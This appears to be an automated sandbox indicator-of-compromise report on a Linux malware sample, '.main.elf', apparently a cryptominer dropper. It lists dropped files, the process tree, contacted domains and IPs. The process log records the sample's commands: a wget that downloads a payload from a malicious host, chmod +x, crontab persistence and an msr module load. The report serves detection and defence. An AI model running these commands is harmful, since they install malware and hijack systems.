IOC Report
.main.elf

loading gif

Files

File Path
Type
Category
Malicious
.main.elf
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
initial sample
 malicious
/var/spool/cron/crontabs/tmp.XlZKKM
ASCII text
dropped
 malicious
/var/tmp/.rcu_gp/.ps5
ASCII text
dropped
 malicious
/var/tmp/.rcu_gp/.report_system
ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, missing section headers at 8825120
dropped
 malicious
/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages
ASCII text, with no line terminators
dropped
/tmp/sh-thd.Mh6q2b
Bourne-Again shell script, ASCII text executable
dropped
/var/tmp/.rcu_gp/.ps4
ASCII text
dropped
/var/tmp/.rcu_gp/diicot
Bourne-Again shell script, ASCII text executable
dropped

Processes

Path
Cmdline
Malicious
/tmp/.main.elf
/tmp/.main.elf
/bin/bash
/tmp/.main.elf -c "exec '/tmp/.main.elf' \"$@\"" /tmp/.main.elf
/tmp/.main.elf
/tmp/.main.elf
/bin/bash
/tmp/.main.elf -c " " /tmp/.main.elf
/bin/bash
-
/usr/bin/mkdir
mkdir /var/tmp/.rcu_gp
/bin/bash
-
/usr/bin/wget
wget http://xkobeimparatu.net/.puscarie/.report_system -O .report_system
/bin/bash
-
/usr/bin/chmod
chmod +x .report_system
/bin/bash
-
/usr/bin/cat
cat
/bin/bash
-
/usr/bin/chmod
chmod +x /var/tmp/.rcu_gp/diicot
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/rm
rm -rf /var/tmp/.rcu_gp/.ps5
/bin/bash
-
/usr/bin/sleep
sleep 1
/bin/bash
-
/usr/bin/sleep
sleep 1
/bin/bash
-
/usr/bin/sleep
sleep 1
/bin/bash
-
/usr/bin/crontab
crontab /var/tmp/.rcu_gp/.ps5
/bin/bash
-
/usr/bin/sleep
sleep 1
/bin/bash
-
/usr/bin/rm
rm -rf /var/tmp/.rcu_gp/.ps5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
/var/tmp/.rcu_gp/diicot
-
/var/tmp/.rcu_gp/./.report_system
/var/tmp/.rcu_gp/./.report_system
/var/tmp/.rcu_gp/./.report_system
-
/var/tmp/.rcu_gp/./.report_system
-
/bin/sh
sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
/bin/sh
-
/sbin/modprobe
/sbin/modprobe msr allow_writes=on
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/sleep
sleep 2.5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/sleep
sleep 2.5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/sleep
sleep 2.5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/sleep
sleep 2.5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/sleep
sleep 2.5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/sleep
sleep 2.5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/sleep
sleep 2.5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/sleep
sleep 2.5
There are 125 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://xmrig.com/benchmark/%s
unknown
https://bugs.launchpad.net/ubuntu/
unknown
https://xmrig.com/wizard
unknown
http://xkobeimparatu.net/.puscarie/.report_system
154.213.192.3
https://gcc.gnu.org/bugsterminate
unknown
https://xmrig.com/wizard%s
unknown
https://xmrig.com/docs/algorithms
unknown

Domains

Name
IP
Malicious
xkobeproxy.xkobeimparatu.net
91.184.240.129
 malicious
xkobeimparatu.net
154.213.192.3

IPs

IP
Domain
Country
Malicious
91.184.240.129
xkobeproxy.xkobeimparatu.net
Russian Federation
malicious
154.213.192.3
xkobeimparatu.net
Seychelles
109.202.202.202
unknown
Switzerland
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
c29000
page execute read
 malicious
e6b000
page read and write
7fbde6528000
page read and write
7fbde68e4000
page read and write
f07000
page read and write
7fbde6526000
page execute read
7fbde671a000
page read and write
2814000
page read and write
7fbde689f000
page read and write
7ffdf35f6000
page execute read
7ffdf35d6000
page read and write
There are 1 hidden memdumps, click here to show them.